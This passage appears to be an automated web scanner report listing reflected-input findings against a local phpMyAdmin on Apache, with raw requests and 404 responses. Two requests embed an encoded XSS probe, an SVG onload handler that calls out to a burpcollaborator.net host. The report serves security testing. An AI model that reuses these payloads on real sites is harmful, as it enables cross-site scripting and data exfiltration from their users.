<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/runmode04dgrptw3r/runmode.js was not found on this server.</p>
...[SNIP]...
19.292. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/lib/codemirror.jst9t1vip8uw HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 342
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/lib/codemirror.jst9t1vip8uw was not found on this server.</p>
...[SNIP]...
19.293. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//iqclg4dcd965i3jgvtkrm0tsljref6b1ztphm4cs1%5c56burpcollaborator.net'%3e/js/vendor/codemirror/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:28 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 437
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//iqclg4dcd965i3jgvtkrm0tsljref6b1ztphm4cs1\56burpcollaborator.net'&gt;/js/vendor/codemirror/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.294. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//zx02nlktkqdmpkqx2ar8th09s0yvmnii6awytlk99%5c56burpcollaborator.net'%3e/vendor/codemirror/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:28 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 445
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//zx02nlktkqdmpkqx2ar8th09s0yvmnii6awytlk99\56burpcollaborator.net'&gt;/vendor/codemirror/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.295. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor36fdlw0jbk/codemirror/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 342
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor36fdlw0jbk/codemirror/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.296. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrorehnv12s7o2/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 342
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrorehnv12s7o2/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.297. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 5]
Previous  Next

Summary

Severity:   Information